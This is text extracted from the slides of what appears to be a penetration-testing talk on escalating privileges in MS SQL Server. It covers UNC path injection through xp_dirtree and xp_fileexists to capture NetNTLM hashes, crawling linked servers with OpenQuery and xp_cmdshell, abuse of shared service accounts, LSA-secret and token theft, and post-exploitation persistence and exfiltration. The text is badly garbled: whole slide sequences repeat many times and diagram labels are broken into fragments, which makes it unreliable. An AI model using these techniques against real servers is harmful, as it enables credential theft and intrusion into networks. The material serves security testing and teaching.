Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
EscalatingPrivileges
Shared Service Accounts
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
